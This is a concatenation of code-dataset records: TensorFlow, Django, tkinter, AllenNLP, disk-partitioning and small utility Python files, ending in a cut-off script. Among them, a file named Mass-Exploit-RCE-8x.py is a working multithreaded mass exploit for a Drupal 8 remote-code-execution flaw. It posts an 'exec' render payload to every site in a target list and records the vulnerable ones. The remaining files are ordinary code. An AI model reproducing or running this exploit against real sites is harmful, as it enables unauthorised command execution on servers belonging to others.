tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(fc2_weights))\n fc2_biases = tf.get_variable('bias', [NUM_LABELS], initializer =\n tf.constant_initializer(0.1))\n logit = tf.matmul(fc1, fc2_weights) + fc2_biases\n\n return logit\n","sub_path":"LeNet-5/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"71409470","text":"from rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework import permissions\n\nfrom halemate_auth.models import User\nfrom halemate_auth.serializers.user import UserUpdateSerializer\nfrom halemate_auth.serializers.hospital import (\n HospitalSerializer,\n HospitalShortSerializer,\n HospitalViewSerializer,\n)\nfrom halemate_auth.permissions import (\n isVerified,\n NoPost,\n IsUserOrAdminOrReadOnly,\n)\n\n\nclass HospitalViewSet(viewsets.ModelViewSet):\n queryset = User.objects.filter(registered_as='H')\n serializer_class = HospitalSerializer\n permission_classes = [permissions.IsAuthenticated,\n IsUserOrAdminOrReadOnly,\n isVerified,\n NoPost,\n ]\n\n def list(self, request, *args, **kwargs):\n queryset = User.objects.filter(registered_as='H')\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = HospitalShortSerializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n serializer = HospitalShortSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n ser_data = serializer.data\n if instance.id == request.user.id:\n return Response(ser_data)\n else:\n ser_data.pop('hospital_appointments')\n return Response(ser_data)\n\n def get_serializer_class(self):\n serializer_class = self.serializer_class\n if self.request.method == 'GET':\n serializer_class = HospitalViewSerializer\n if self.request.method == 'PUT' or self.request.method == 'PATCH':\n serializer_class = UserUpdateSerializer\n return serializer_class\n","sub_path":"halemate_auth/views/hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248154996","text":"import tkinter\nfrom tkinter import ttk\n\n\nwin = tkinter.Tk()\n\nwin.title(\"框架frame示例窗口\")\nwin.geometry(\"600x400+300+20\")\n\n# 创建一个表格或树形结构\ntable = ttk.Treeview(win)\ntable.pack()\n\n# 定义表格的列\ntable[\"columns\"]=(\"name\",\"age\",\"height\",\"weight\")\n\n# 设置每个列的宽度\ntable.column(\"name\", width=100)\ntable.column(\"age\", width=100)\ntable.column(\"height\", width=100)\ntable.column(\"weight\", width=100)\n\n# 设置每个列的头,并指定显示名称\ntable.heading(\"name\", text=\"姓名\")\ntable.heading(\"age\", text=\"年龄\")\ntable.heading(\"height\", text=\"身高\")\ntable.heading(\"weight\", text=\"体重\")\n\n# 插入数据,第一个字段空字符串表示该数据所属的上级为空,即顶级,第二个字段表示数据行标识,从0开始\n# values是真正插入的值,元组\ntable.insert(\"\", 0, text=\"line1\", values=(\"崔晓东\", 33, 176, 75))\ntable.insert(\"\", 1, text=\"line2\", values=(\"程咬金\", 13, 176, 75))\n\n\n# 定义一个树状结构,跟前面表状的一样\ntree = ttk.Treeview(win)\ntree.pack()\n\n# 插入根节点\ntreeroot1 = tree.insert(\"\", 0, \"中国\", text=\"中国\", values=\"CHN\")\ntreeroot2 = tree.insert(\"\", 1, \"美国\", text=\"美国\", values=\"USA\")\n\n# 在中国这个根节点下插入一级节点\nleaf1_1 = tree.insert(treeroot1, 0, \"浙江\", text=\"浙江\", values=\"ZJ\")\nleaf1_2 = tree.insert(treeroot1, 1, \"江苏\", text=\"江苏\", values=\"JS\")\n\n# 在两个省份一级节点下各自插入两个二级城市节点\nleaf2_11 = tree.insert(leaf1_1, 0, \"杭州\", text=\"杭州\", values=\"hz\")\nleaf2_12 = tree.insert(leaf1_1, 1, \"宁波\", text=\"宁波\", values=\"nb\")\n\nleaf2_21 = tree.insert(leaf1_2, 0, \"南京\", text=\"南京\", values=\"nj\")\nleaf2_22 = tree.insert(leaf1_2, 1, \"盐城\", text=\"盐城\", values=\"yc\")\n\nwin.mainloop()","sub_path":"17.GUI编程tkinter模块四/table_tree.py","file_name":"table_tree.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336755512","text":"from django.shortcuts import render, redirect, HttpResponse, reverse\nfrom my_crm import models\nfrom my_crm.forms import RegForm, CustomerForm\nimport hashlib\nfrom django.conf import global_settings\nfrom django.contrib.sessions.backends import db\nfrom django.views import View\nfrom django.db.models import Q\nfrom my_crm.utils.pagination import Pagination\nfrom django.http.request import QueryDict\n\n\ndef index(request):\n return HttpResponse('index')\n\n\ndef login(request):\n err_msg = ''\n if request.method == 'POST':\n user = request.POST.get('user')\n pwd = request.POST.get('pwd')\n md5 = hashlib.md5()\n md5.update(pwd.encode('utf-8'))\n pwd = md5.hexdigest()\n obj = models.UserProfile.objects.filter(username=user, password=pwd, is_active=True).first()\n if obj:\n request.session['user_id'] = obj.pk\n return redirect('/index/')\n err_msg = '用户名或密码错误'\n return render(request, 'login.html', {'err_msg': err_msg})\ndef logout(request):\n request.session.flush()\n return redirect(reverse('login'))\n\n\ndef reg(request):\n form_obj = RegForm()\n if request.method == 'POST':\n form_obj = RegForm(request.POST)\n if form_obj.is_valid():\n form_obj.save()\n return redirect('/login/')\n\n return render(request, 'reg.html', {'form_obj': form_obj})\n\n\ndef customer_list(request):\n if request.path_info == reverse('customer_list'):\n all_customer = models.Customer.objects.filter(consultant__isnull=True, )\n else:\n all_customer = models.Customer.objects.filter(consultant=request.account)\n\n return render(request, 'customer_list.html', {'all_customer': all_customer})\n\n\nclass CustomerList(View):\n\n def get(self, request):\n\n q = self.search(['qq', 'name', ])\n\n if request.path_info == reverse('customer_list'):\n all_customer = models.Customer.objects.filter(q, consultant__isnull=True, )\n else:\n all_customer = models.Customer.objects.filter(q, consultant=request.account)\n\n pager = Pagination(request.GET.get('page', '1'), all_customer.count(), request.GET.copy(), 2)\n return render(request, 'customer_list.html', {\n 'all_customer': all_customer[pager.start: pager.end],\n 'page_html': pager.page_html\n })\n\n def post(self, request):\n action = request.POST.get('action')\n\n if not hasattr(self, action):\n return HttpResponse('非法操作')\n\n getattr(self, action)()\n\n return self.get(request)\n\n def multi_apply(self):\n ids = self.request.POST.getlist('id')\n models.Customer.objects.filter(id__in=ids).update(consultant=self.request.account)\n def multi_public(self):\n ids = self.request.POST.getlist('id')\n models.Customer.objects.filter(id__in=ids).update(consultant=None)\n def search(self, query_list):\n query = self.request.GET.get('query', '')\n q = Q()\n q.connector = 'OR'\n for i in query_list:\n q.children.append(Q(('{}__contains'.format(i), query)))\n\n return q\n\n\nuserlist = [{'name': 'alex-{}'.format(i), 'pwd': \"alexdsb-{}\".format(i)} for i in range(1, 402)]\n\n\ndef user_list(request):\n try:\n page = int(request.GET.get('page', '1'))\n if page <= 0:\n page = 1\n except Exception as e:\n page = 1\n print(page)\n per_num = 15\n all_count = len(userlist)\n page_num, more = divmod(all_count, per_num)\n if more:\n page_num += 1\n max_show = 11\n half_show = max_show // 2\n\n if page_num < max_show:\n page_start = 1\n page_end = page_num\n else:\n if page <= half_show:\n page_start = 1\n page_end = max_show\n elif page + half_show > page_num:\n page_start = page_num - max_show + 1\n page_end = page_num\n else:\n page_start = page - half_show\n page_end = page + half_show\n\n \"\"\"\n 1 0 15\n 2 15 30\n 3 30 45\n \"\"\"\n start = (page - 1) * per_num\n end = page * per_num\n\n li_list = []\n if page == 1:\n li_list.append('
  • <<
  • ')\n else:\n li_list.append('
  • <<
  • '.format(page - 1))\n\n for i in range(page_start, page_end + 1):\n if page == i:\n li_list.append('
  • {}
  • '.format(i, i))\n else:\n li_list.append('
  • {}
  • '.format(i, i))\n\n if page == page_num:\n li_list.append('
  • >>
  • ')\n else:\n li_list.append('
  • >>
  • '.format(page + 1))\n\n page_html = ''.join(li_list)\n\n return render(request, 'user_list.html',\n {\"all_user\": userlist[start:end],\n 'page_html': page_html\n }, )\n\n\ndef user_list(request):\n pager = Pagination(request.GET.get('page', '1'), len(userlist), per_num=10, max_show=15)\n\n return render(request, 'user_list.html',\n {\"all_user\": userlist[pager.start:pager.end],\n 'page_html': pager.page_html\n }, )\ndef customer_add(request):\n form_obj = CustomerForm()\n if request.method == 'POST':\n form_obj = CustomerForm(request.POST)\n if form_obj.is_valid():\n\n form_obj.save()\n return redirect(reverse('customer_list'))\n return render(request, 'customer_add.html', {'form_obj': form_obj})\ndef customer_edit(request, edit_id):\n obj = models.Customer.objects.filter(pk=edit_id).first()\n form_obj = CustomerForm(instance=obj)\n if request.method == 'POST':\n form_obj = CustomerForm(request.POST, instance=obj)\n if form_obj.is_valid():\n form_obj.save()\n return redirect(reverse('customer_list'))\n return render(request, 'customer_edit.html', {'form_obj': form_obj})\ndef customer_change(request, edit_id=None):\n obj = models.Customer.objects.filter(pk=edit_id).first()\n form_obj = CustomerForm(instance=obj)\n if request.method == 'POST':\n form_obj = CustomerForm(request.POST, instance=obj)\n if form_obj.is_valid():\n form_obj.save()\n return redirect(reverse('customer_list'))\n return render(request, 'customer_change.html', {'form_obj': form_obj, 'edit_id': edit_id})\n","sub_path":"my_app/new_plane/my_crm/my_views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147776752","text":"class Solution:\n def findAndReplacePattern(self, words, ptn):\n\n def solve(w):\n p = {}\n for i in range(len(w)):\n if ord(w[i]) not in p:\n p[ord(w[i])] = [i]\n else:\n p[ord(w[i])].append(i)\n return sorted(p.values())\n\n std = solve(ptn)\n ans = []\n for word in words:\n if solve(word) == std: ans.append(word)\n return ans\n","sub_path":"Python/find-and-replace-pattern.py","file_name":"find-and-replace-pattern.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316567197","text":"#\n# Copyright (c) 2003 Intel Corporation\n# All rights reserved.\n#\n# Copyright (c) 2004-2006 The Trustees of Princeton University\n# All rights reserved.\n# expected /proc/partitions format\n\nimport os, sys\nimport string\nimport popen2\nimport time\n\nfrom Exceptions import *\nimport utils\nimport BootServerRequest\nimport BootAPI\nimport ModelOptions\n\ndef Run(vars, log):\n \"\"\"\n Setup the block devices for install, partition them w/ LVM\n\n Expect the following variables from the store:\n INSTALL_BLOCK_DEVICES list of block devices to install onto\n TEMP_PATH somewhere to store what we need to run\n ROOT_SIZE the size of the root logical volume\n SWAP_SIZE the size of the swap partition\n \"\"\"\n\n log.write(\"\\n\\nStep: Install: partitioning disks.\\n\")\n\n # make sure we have the variables we need\n try:\n TEMP_PATH = vars[\"TEMP_PATH\"]\n if TEMP_PATH == \"\":\n raise ValueError(\"TEMP_PATH\")\n\n INSTALL_BLOCK_DEVICES = vars[\"INSTALL_BLOCK_DEVICES\"]\n if(len(INSTALL_BLOCK_DEVICES) == 0):\n raise ValueError(\"INSTALL_BLOCK_DEVICES is empty\")\n\n # use vs_ROOT_SIZE or lxc_ROOT_SIZE as appropriate\n varname = vars['virt'] + \"_ROOT_SIZE\"\n ROOT_SIZE = vars[varname]\n if ROOT_SIZE == \"\" or ROOT_SIZE == 0:\n raise ValueError(\"ROOT_SIZE invalid\")\n\n SWAP_SIZE = vars[\"SWAP_SIZE\"]\n if SWAP_SIZE == \"\" or SWAP_SIZE == 0:\n raise ValueError(\"SWAP_SIZE invalid\")\n\n NODE_MODEL_OPTIONS = vars[\"NODE_MODEL_OPTIONS\"]\n\n PARTITIONS = vars[\"PARTITIONS\"]\n if PARTITIONS == None:\n raise ValueError(\"PARTITIONS\")\n\n if NODE_MODEL_OPTIONS & ModelOptions.RAWDISK:\n VSERVERS_SIZE = \"-1\"\n if \"VSERVERS_SIZE\" in vars:\n VSERVERS_SIZE = vars[\"VSERVERS_SIZE\"]\n if VSERVERS_SIZE == \"\" or VSERVERS_SIZE == 0:\n raise ValueError(\"VSERVERS_SIZE\")\n\n except KeyError as var:\n raise BootManagerException(\"Missing variable in vars: {}\\n\".format(var))\n except ValueError as var:\n raise BootManagerException(\"Variable in vars, shouldn't be: {}\\n\".format(var))\n\n bs_request = BootServerRequest.BootServerRequest(vars)\n\n\n # disable swap if its on\n utils.sysexec_noerr(\"swapoff {}\".format(PARTITIONS[\"swap\"]), log)\n\n # shutdown and remove any lvm groups/volumes\n utils.sysexec_noerr(\"vgscan\", log)\n utils.sysexec_noerr(\"vgchange -ay\", log)\n utils.sysexec_noerr(\"lvremove -f {}\".format(PARTITIONS[\"root\"]), log)\n utils.sysexec_noerr(\"lvremove -f {}\".format(PARTITIONS[\"swap\"]), log)\n utils.sysexec_noerr(\"lvremove -f {}\".format(PARTITIONS[\"vservers\"]), log)\n utils.sysexec_noerr(\"vgchange -an\", log)\n utils.sysexec_noerr(\"vgremove -f planetlab\", log)\n\n log.write(\"Running vgscan for devices\\n\")\n utils.sysexec_noerr(\"vgscan\", log)\n\n used_devices = []\n\n INSTALL_BLOCK_DEVICES.sort()\n\n for device in INSTALL_BLOCK_DEVICES:\n if single_partition_device(device, vars, log):\n if (len(used_devices) > 0 and\n (vars['NODE_MODEL_OPTIONS'] & ModelOptions.RAWDISK)):\n log.write(\"Running in raw disk mode, not using {}.\\n\".format(device))\n else:\n used_devices.append(device)\n log.write(\"Successfully initialized {}\\n\".format(device))\n else:\n log.write(\"Unable to partition {}, not using it.\\n\".format(device))\n continue\n\n # list of devices to be used with vgcreate\n vg_device_list = \"\"\n\n # get partitions\n partitions = []\n for device in used_devices:\n part_path = get_partition_path_from_device(device, vars, log)\n partitions.append(part_path)\n\n # create raid partition\n raid_partition = create_raid_partition(partitions, vars, log)\n if raid_partition != None:\n partitions = [raid_partition]\n log.write(\"partitions={}\\n\".format(partitions))\n # initialize the physical volumes\n for part_path in partitions:\n if not create_lvm_physical_volume(part_path, vars, log):\n raise BootManagerException(\"Could not create lvm physical volume \"\n \"on partition {}\".format(part_path))\n vg_device_list = vg_device_list + \" \" + part_path\n\n # create an lvm volume group\n utils.sysexec(\"vgcreate -s32M planetlab {}\".format(vg_device_list), log)\n\n # create swap logical volume\n utils.sysexec(\"lvcreate -L{} -nswap planetlab\".format(SWAP_SIZE), log)\n\n # check if we want a separate partition for VMs\n one_partition = vars['ONE_PARTITION']=='1'\n if one_partition:\n remaining_extents = get_remaining_extents_on_vg(vars, log)\n utils.sysexec(\"lvcreate -l{} -nroot planetlab\".format(remaining_extents), log)\n else:\n utils.sysexec(\"lvcreate -L{} -nroot planetlab\".format(ROOT_SIZE), log)\n if vars['NODE_MODEL_OPTIONS'] & ModelOptions.RAWDISK and VSERVERS_SIZE != \"-1\":\n utils.sysexec(\"lvcreate -L{} -nvservers planetlab\".format(VSERVERS_SIZE), log)\n remaining_extents = get_remaining_extents_on_vg(vars, log)\n utils.sysexec(\"lvcreate -l{} -nrawdisk planetlab\".format(remaining_extents), log)\n else:\n # create vservers logical volume with all remaining space\n # first, we need to get the number of remaining extents we can use\n remaining_extents = get_remaining_extents_on_vg(vars, log)\n utils.sysexec(\"lvcreate -l{} -nvservers planetlab\".format(remaining_extents), log)\n\n # activate volume group (should already be active)\n #utils.sysexec(TEMP_PATH + \"vgchange -ay planetlab\", log)\n\n # make swap\n utils.sysexec(\"mkswap -f {}\".format(PARTITIONS[\"swap\"]), log)\n\n # check if badhd option has been set\n option = ''\n txt = ''\n if NODE_MODEL_OPTIONS & ModelOptions.BADHD:\n option = '-c'\n txt = \" with bad block search enabled, which may take a while\"\n\n # filesystems partitions names and their corresponding\n # reserved-blocks-percentages\n filesystems = {\"root\": 5, \"vservers\": 0}\n\n # ROOT filesystem is always with ext2\n fs = 'root'\n rbp = filesystems[fs]\n devname = PARTITIONS[fs]\n log.write(\"formatting {} partition ({}){}.\\n\".format(fs, devname, txt))\n utils.sysexec(\"mkfs.ext2 -q {} -m {} -j {}\".format(option, rbp, devname), log)\n # disable time/count based filesystems checks\n utils.sysexec_noerr(\"tune2fs -c -1 -i 0 {}\".format(devname), log)\n\n # VSERVER filesystem with btrfs to support snapshoting and stuff\n fs = 'vservers'\n rbp = filesystems[fs]\n devname = PARTITIONS[fs]\n if vars['virt'] == 'vs':\n log.write(\"formatting {} partition ({}){}.\\n\".format(fs, devname, txt))\n utils.sysexec(\"mkfs.ext2 -q {} -m {} -j {}\".format(option, rbp, devname), log)\n # disable time/count based filesystems checks\n utils.sysexec_noerr(\"tune2fs -c -1 -i 0 {}\".format(devname), log)\n elif not one_partition:\n log.write(\"formatting {} btrfs partition ({}).\\n\".format(fs, devname))\n # early BootCD's seem to come with a version of mkfs.btrfs that does not support -f\n # let's check for that before invoking it\n mkfs = \"mkfs.btrfs\"\n if os.system(\"mkfs.btrfs --help 2>&1 | grep force\") == 0:\n mkfs += \" -f\"\n mkfs += \" {}\".format(devname)\n utils.sysexec(mkfs, log)\n # as of 2013/02 it looks like there's not yet an option to set fsck frequency with btrfs\n\n # save the list of block devices in the log\n log.write(\"Block devices used (in lvm): {}\\n\".format(repr(used_devices)))\n\n # list of block devices used may be updated\n vars[\"INSTALL_BLOCK_DEVICES\"] = used_devices\n\n utils.display_disks_status(PARTITIONS, \"End of InstallPartitionDisks\", log)\n\n return 1\n\n\nimport parted\ndef single_partition_device(device, vars, log):\n \"\"\"\n initialize a disk by removing the old partition tables,\n and creating a new single partition that fills the disk.\n\n return 1 if sucessful, 0 otherwise\n \"\"\"\n\n # two forms, depending on which version of pyparted we have\n # v1 does not have a 'version' method\n # v2 and above does, but to make it worse,\n # parted-3.4 on f14 has parted.version broken and raises SystemError\n try:\n parted.version()\n return single_partition_device_2_x(device, vars, log)\n except AttributeError:\n # old parted does not have version at all\n return single_partition_device_1_x(device, vars, log)\n except SystemError:\n # let's assume this is >=2\n return single_partition_device_2_x(device, vars, log)\n except:\n raise\n\ndef single_partition_device_1_x(device, vars, log):\n\n lvm_flag = parted.partition_flag_get_by_name('lvm')\n\n try:\n log.write(\"Using pyparted 1.x\\n\")\n # wipe the old partition table\n utils.sysexec(\"dd if=/dev/zero of={} bs=512 count=1\".format(device), log)\n\n # get the device\n dev = parted.PedDevice.get(device)\n\n # create a new partition table\n disk = dev.disk_new_fresh(parted.disk_type_get(\"msdos\"))\n\n # create one big partition on each block device\n constraint = dev.constraint_any()\n\n new_part = disk.partition_new(\n parted.PARTITION_PRIMARY,\n parted.file_system_type_get(\"ext2\"),\n 0, 1)\n\n # make it an lvm partition\n new_part.set_flag(lvm_flag, 1)\n\n # actually add the partition to the disk\n disk.add_partition(new_part, constraint)\n\n disk.maximize_partition(new_part,constraint)\n\n disk.commit()\n del disk\n\n except BootManagerException as exc:\n log.write(\"BootManagerException while running: {}\\n\".format(str(exc)))\n return 0\n\n except parted.error as exc:\n log.write(\"parted exception while running: {}\\n\".format(str(exc)))\n return 0\n\n return 1\n\n\n\ndef single_partition_device_2_x(device, vars, log):\n try:\n log.write(\"Using pyparted 2.x\\n\")\n\n # Thierry june 2012 -- for disks larger than 2TB\n # calling this with part_type='msdos' would fail at the maximizePartition stage\n # create a new partition table\n def partition_table(device, part_type, fs_type):\n # wipe the old partition table\n utils.sysexec(\"dd if=/dev/zero of={} bs=512 count=1\".format(device), log)\n # get the device\n dev = parted.Device(device)\n disk = parted.freshDisk(dev, part_type)\n # create one big partition on each block device\n constraint = parted.constraint.Constraint(device=dev)\n geometry = parted.geometry.Geometry(device=dev, start=0, end=1)\n fs = parted.filesystem.FileSystem(type=fs_type, geometry=geometry)\n new_part = parted.partition.Partition(disk, type=parted.PARTITION_NORMAL,\n fs=fs, geometry=geometry)\n # make it an lvm partition\n new_part.setFlag(parted.PARTITION_LVM)\n # actually add the partition to the disk\n disk.addPartition(new_part, constraint)\n disk.maximizePartition(new_part, constraint)\n disk.commit()\n log.write(\"Current disk for {} - partition type {}\\n{}\\n\".format(device, part_type, disk))\n log.write(\"Current dev for {}\\n{}\\n\".format(device, dev))\n del disk\n\n try:\n partition_table(device, 'msdos', 'ext2')\n except:\n partition_table(device, 'gpt', 'ext2')\n\n except Exception as e:\n log.write(\"Exception inside single_partition_device_2_x : {}\\n\".format(str(e)))\n import traceback\n traceback.print_exc(file=log)\n return 0\n\n return 1\n\n\n\ndef create_lvm_physical_volume(part_path, vars, log):\n \"\"\"\n make the specificed partition a lvm physical volume.\n\n return 1 if successful, 0 otherwise.\n \"\"\"\n\n try:\n # again, wipe any old data, this time on the partition\n utils.sysexec(\"dd if=/dev/zero of={} bs=512 count=1\".format(part_path), log)\n ### patch Thierry Parmentelat, required on some hardware\n import time\n time.sleep(1)\n utils.sysexec(\"pvcreate -ffy {}\".format(part_path), log)\n except BootManagerException as e:\n log.write(\"create_lvm_physical_volume failed.\\n\")\n return 0\n\n return 1\n\n\ndef create_raid_partition(partitions, vars, log):\n \"\"\"\n create raid array using specified partitions.\n \"\"\"\n raid_part = None\n raid_enabled = False\n node_tags = BootAPI.call_api_function(vars, \"GetNodeTags\",\n ({'node_id': vars['NODE_ID']},))\n for node_tag in node_tags:\n if node_tag['tagname'] == 'raid_enabled' and \\\n node_tag['value'] == '1':\n raid_enabled = True\n break\n if not raid_enabled:\n return raid_part\n\n try:\n log.write(\"Software raid enabled.\\n\")\n # wipe everything\n utils.sysexec_noerr(\"mdadm --stop /dev/md0\", log)\n time.sleep(1)\n for part_path in partitions:\n utils.sysexec_noerr(\"mdadm --zero-superblock {} \".format(part_path), log)\n\n # assume each partiton is on a separate disk\n num_parts = len(partitions)\n if num_parts < 2:\n log.write(\"Not enough disks for raid. Found: {}\\n\".format(partitions))\n raise BootManagerException(\"Not enough disks for raid. Found: {}\\n\".format(partitions))\n if num_parts == 2:\n lvl = 1\n else:\n lvl = 5\n\n # make the array\n part_list = \" \".join(partitions)\n raid_part = \"/dev/md0\"\n cmd = \"mdadm --create {raid_part} --chunk=128 --level=raid{lvl} \"\\\n \"--raid-devices={num_parts} {part_list}\".format(**locals())\n utils.sysexec(cmd, log)\n\n except BootManagerException as e:\n log.write(\"create_raid_partition failed.\\n\")\n raid_part = None\n\n return raid_part\n\n\ndef get_partition_path_from_device(device, vars, log):\n \"\"\"\n given a device, return the path of the first partition on the device\n \"\"\"\n\n # those who wrote the cciss driver just had to make it difficult\n cciss_test = \"/dev/cciss\"\n if device[:len(cciss_test)] == cciss_test:\n part_path = device + \"p1\"\n else:\n part_path = device + \"1\"\n\n return part_path\n\n\n\ndef get_remaining_extents_on_vg(vars, log):\n \"\"\"\n return the free amount of extents on the planetlab volume group\n \"\"\"\n\n c_stdout, c_stdin = popen2.popen2(\"vgdisplay -c planetlab\")\n result = string.strip(c_stdout.readline())\n c_stdout.close()\n c_stdin.close()\n remaining_extents = string.split(result, \":\")[15]\n\n return remaining_extents\n","sub_path":"source/steps/InstallPartitionDisks.py","file_name":"InstallPartitionDisks.py","file_ext":"py","file_size_in_byte":14821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162284964","text":"from typing import Dict, Union, Optional\nimport torch\n\nfrom allennlp.data.vocabulary import Vocabulary\nfrom allennlp.models.model import Model\nfrom allennlp.modules.seq2vec_encoders import BertPooler\nfrom allennlp.nn.util import get_text_field_mask\n\nfrom my_library.models.layers import bert_embeddings\n\n\n@Model.register(\"bert_encoder\")\nclass BertEncoder(Model):\n def __init__(\n self,\n vocab: Vocabulary,\n bert_path: str,\n dropout: float = 0.0,\n trainable: bool = False,\n ) -> None:\n super().__init__(vocab)\n\n self._embeddings = bert_embeddings(pretrained_model=bert_path,\n training=trainable)\n self.pooler = BertPooler(pretrained_model=bert_path,\n dropout=dropout)\n\n def forward( # type: ignore\n self, text: Dict[str, torch.LongTensor]) -> torch.Tensor:\n mask = get_text_field_mask(text)\n emb = self._embeddings(text)\n encoding = self.pooler(emb, mask)\n\n return encoding\n","sub_path":"my_library/models/feature_extractor_bert.py","file_name":"feature_extractor_bert.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"465695688","text":"\"\"\"HelloWorld URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\nfrom django.contrib import staticfiles\r\nfrom django.conf.urls import url\r\nfrom . import search #导入search.py\r\nfrom login.views import index,login,register,info,infochange,redict\r\nfrom review.views import submit\r\nfrom history.views import recommend,detail,dfind,find,testfind\r\nurlpatterns = [\r\n\r\n #进入系统首页\r\n url(r'^$', index),\r\n\r\n #登录\r\n url(r'^login/$',login),\r\n\r\n #注册\r\n url(r'^register/$',register),\r\n\r\n #搜索\r\n url(r'^search$', search.search),\r\n\r\n #论文数量排名\r\n # 直方图统计\r\n url(r'^echarts.html$', search.Echarts),\r\n # 地图热图统计\r\n url(r'^chinamap.html$',search.Chinamap),\r\n\r\n #首页功能(获取session用户名)\r\n url(r'^searchfirst$', search.search_form),\r\n\r\n #翻页\r\n url(r'^page$', search.Page),\r\n\r\n #右侧扇形图\r\n url(r'^echarts-cirle.html$', search.Echscirle),\r\n\r\n #评论入口\r\n url(r'^insert$', search.insert),\r\n\r\n #提交评论\r\n url(r'^submit$',submit),\r\n\r\n #推荐论文入口\r\n url(r'^recommend/$',recommend),\r\n\r\n #知识图谱\r\n url(r'^graphnpm$', search.Graph),\r\n\r\n #个人信息入口\r\n url(r'^info/$',info),\r\n\r\n #修改个人信息\r\n url(r'^infochange$',infochange),\r\n\r\n #修改信息后重定向到首页\r\n url(r'^redict$',redict),\r\n\r\n #查看详情论文\r\n url(r'^detail$',detail),\r\n\r\n #论文查找入口\r\n url(r'^dfind$',dfind),\r\n #点击查看论文功能\r\n url(r'^find$',find),\r\n url(r'^testfind$',testfind),\r\n]\r\n#静态文件处理1.4版本需要\r\nurlpatterns += staticfiles_urlpatterns()\r\n","sub_path":"HelloWorld/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65065357","text":"#!/usr/bin/env python\n# -- coding:utf-8 -*-\nfrom collections import Counter\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef main():\n m_list = pickle.load(open('neko.txt.mecab.pkl', 'rb'))\n word_list = []\n for words in m_list:\n str_list = [dic['surface'] for dic in words]\n word_list.extend(str_list)\n ranking = Counter(word_list).most_common()\n\n plt.xscale('log')\n plt.yscale('log')\n plt.scatter(np.arange(len(ranking)) + 1, [v for k, v in ranking])\n # こっちでも同じ結果になる\n # plt.loglog(np.arange(len(ranking)) + 1, [v for k, v in ranking], 'o')\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"chapter4/k39.py","file_name":"k39.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627753333","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3\n\nimport sys\nimport requests\nimport re\nfrom multiprocessing.dummy import Pool\n\nrequests.urllib3.disable_warnings()\n\ntry:\n target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]\nexcept IndexError:\n exit('noob: pd.py list.txt')\n\ndef chips(yeah):\n try:\n url = yeah + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\n kelosex = {\"form_id\": \"user_register_form\", \"_drupal_ajax\": \"1\", \"mail[#post_render][]\": \"exec\", \"mail[#type]\": \"markup\", \"mail[#markup]\": \"echo omelette\"}\n if 'omelette' in requests.post(url, data=kelosex, verify=False).text:\n open(\"lacoste\",\"a\").write(yeah+\"/\\n\")\n print(yeah, \" -> Vuln frr\")\n else:\n print(yeah, \" -> Nan\") \n except:\n pass\n\nmp = Pool(100)\nmp.map(chips, target)\nmp.close()\nmp.join()\n","sub_path":"Drupal/Mass-Exploit-RCE-8x.py","file_name":"Mass-Exploit-RCE-8x.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28462611","text":"import unittest\nfrom os import path, getcwd\nfrom time import sleep\n\nfrom modules.audio import Audio\n\n\nclass AudioTest(unittest.TestCase):\n def test_audio(self):\n filepath = path.join(getcwd(), \"test.mp3\")\n test = Audio(filepath)\n test.play()\n sleep(1)\n self.assertEqual(test.playing, True)\n test.stop()\n sleep(1)\n self.assertEqual(test.playing, False)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283524878","text":"# coding: utf-8\nimport sys #Importation de sys\nimport os\nimport requests #Importation de request, sinon bah j'peux pas faire de requête vers l'API ^^\n\n\n\n#Petite bannière pour faire classe\ndef banner():\n os.system('cls')\n print('''\n\n\n ██╗ ██╗██╗ ██╗ ██████╗ 